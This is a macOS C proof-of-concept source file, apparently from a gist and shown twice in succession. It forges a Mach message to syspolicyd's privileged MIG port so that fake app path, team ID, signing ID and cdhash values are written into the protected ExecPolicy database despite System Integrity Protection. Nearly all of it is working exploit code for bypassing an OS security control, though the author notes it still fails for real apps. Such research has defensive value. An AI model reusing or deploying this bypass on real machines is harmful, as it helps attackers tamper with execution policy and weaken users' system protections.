knightsc/aspmig.c

## aspmig.c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>

/*
This allows you to write to /var/db/SystemPolicyConfiguration/ExecPolicy
even with SIP on. Basically before syspolicyd determines if the values
you pass can be checked or not it will save them to the ExecPolicy
database.

There are still errors when passing in a real application.

default	08:22:28.588787 -0500	trustd	asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0)
default	08:22:28.617267 -0500	syspolicyd	-[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private>
error	08:22:28.617885 -0500	syspolicyd	failed to call driver: 0x3
*/

struct message {
    mach_msg_header_t hdr;
    uint32_t u1;
    uint32_t u2;
    uint32_t eval_id;
    uint32_t u3;
    uid_t uid;
    pid_t pid;
    uint32_t u4;
    uint32_t path_size;
    char path[1024];
    uint32_t u5;
    uint32_t team_id_size;
    char team_id[64];
    uint32_t u6;
    uint32_t signing_id_size;
    char signing_id[128];
    char cdhash[20];
};

int
main(int argc, char *argv[])
{
    kern_return_t kr;
    mach_port_t host;
    mach_port_t host_priv;
    mach_port_t asp_port;

    struct message msg;

    host = mach_host_self();
    kr = host_get_host_priv_port(host, &host_priv);
    if (kr != KERN_SUCCESS) {
        printf("Error getting host_priv port\n");
        exit(1);
    }

    kr = host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_SYSPOLICYD_PORT, &asp_port);
    if (kr != KERN_SUCCESS) {
        printf("Error getting syspolicyd mig port\n");
        exit(1);
    }

    msg.hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND);
    msg.hdr.msgh_size = sizeof(msg);
    msg.hdr.msgh_remote_port = asp_port;
    msg.hdr.msgh_local_port = MACH_PORT_NULL;
    msg.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg.hdr.msgh_id = 0x48a8;

    msg.u1 = 0;
    msg.u2 = 1;
    msg.eval_id = 2;
    msg.u3 = 0;
    msg.uid = 502;
    msg.pid = 1;

    msg.u4 = 0;
    msg.path_size = 1024;
    memset(msg.path, 0, msg.path_size);
    strncpy(msg.path, "/Applications/FakeApp.app", msg.path_size);

    msg.u5 = 0;
    msg.team_id_size = 64;
    memset(msg.team_id, 0, msg.team_id_size);
    strncpy(msg.team_id, "ABCDEFGHIJ", msg.team_id_size);

    msg.u6 = 0;
    msg.signing_id_size = 128;
    memset(msg.signing_id, 0, msg.signing_id_size);
    strncpy(msg.signing_id, "com.fake.bundle.Id", msg.signing_id_size);

    strncpy(msg.cdhash, "\xd7\x4a\x6b\x33\x0a\x8c\x67\xc4\x8f\xc0\xf8\xbb\xc7\xe0\xdc\x46\x55\xe2\x44\xb8", 20);

    kr = mach_msg(
        &msg.hdr,
        MACH_SEND_MSG,
        sizeof(msg),
        0,
        MACH_PORT_NULL,
        MACH_MSG_TIMEOUT_NONE,
        MACH_PORT_NULL
    );

    if (kr != KERN_SUCCESS) {
        printf("Error sending mach msg\n");
        exit(1);
    }

    return 0;
}
	#include <errno.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <mach/mach.h>

	/*
	This allows you to write to /var/db/SystemPolicyConfiguration/ExecPolicy
	even with SIP on. Basically before syspolicyd determines if the values
	you pass can be checked or not it will save them to the ExecPolicy
	database.

	There are still errors when passing in a real application.

	default 08:22:28.588787 -0500 trustd asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0)
	default 08:22:28.617267 -0500 syspolicyd -[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private>
	error 08:22:28.617885 -0500 syspolicyd failed to call driver: 0x3
	*/

	struct message {
	mach_msg_header_t hdr;
	uint32_t u1;
	uint32_t u2;
	uint32_t eval_id;
	uint32_t u3;
	uid_t uid;
	pid_t pid;
	uint32_t u4;
	uint32_t path_size;
	char path[1024];
	uint32_t u5;
	uint32_t team_id_size;
	char team_id[64];
	uint32_t u6;
	uint32_t signing_id_size;
	char signing_id[128];
	char cdhash[20];
	};

	int
	main(int argc, char *argv[])
	{
	kern_return_t kr;
	mach_port_t host;
	mach_port_t host_priv;
	mach_port_t asp_port;

	struct message msg;

	host = mach_host_self();
	kr = host_get_host_priv_port(host, &host_priv);
	if (kr != KERN_SUCCESS) {
	printf("Error getting host_priv port\n");
	exit(1);
	}

	kr = host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_SYSPOLICYD_PORT, &asp_port);
	if (kr != KERN_SUCCESS) {
	printf("Error getting syspolicyd mig port\n");
	exit(1);
	}

	msg.hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND);
	msg.hdr.msgh_size = sizeof(msg);
	msg.hdr.msgh_remote_port = asp_port;
	msg.hdr.msgh_local_port = MACH_PORT_NULL;
	msg.hdr.msgh_voucher_port = MACH_PORT_NULL;
	msg.hdr.msgh_id = 0x48a8;

	msg.u1 = 0;
	msg.u2 = 1;
	msg.eval_id = 2;
	msg.u3 = 0;
	msg.uid = 502;
	msg.pid = 1;

	msg.u4 = 0;
	msg.path_size = 1024;
	memset(msg.path, 0, msg.path_size);
	strncpy(msg.path, "/Applications/FakeApp.app", msg.path_size);

	msg.u5 = 0;
	msg.team_id_size = 64;
	memset(msg.team_id, 0, msg.team_id_size);
	strncpy(msg.team_id, "ABCDEFGHIJ", msg.team_id_size);

	msg.u6 = 0;
	msg.signing_id_size = 128;
	memset(msg.signing_id, 0, msg.signing_id_size);
	strncpy(msg.signing_id, "com.fake.bundle.Id", msg.signing_id_size);

	strncpy(msg.cdhash, "\xd7\x4a\x6b\x33\x0a\x8c\x67\xc4\x8f\xc0\xf8\xbb\xc7\xe0\xdc\x46\x55\xe2\x44\xb8", 20);

	kr = mach_msg(
	&msg.hdr,
	MACH_SEND_MSG,
	sizeof(msg),
	0,
	MACH_PORT_NULL,
	MACH_MSG_TIMEOUT_NONE,
	MACH_PORT_NULL
	);

	if (kr != KERN_SUCCESS) {
	printf("Error sending mach msg\n");
	exit(1);
	}

	return 0;
	}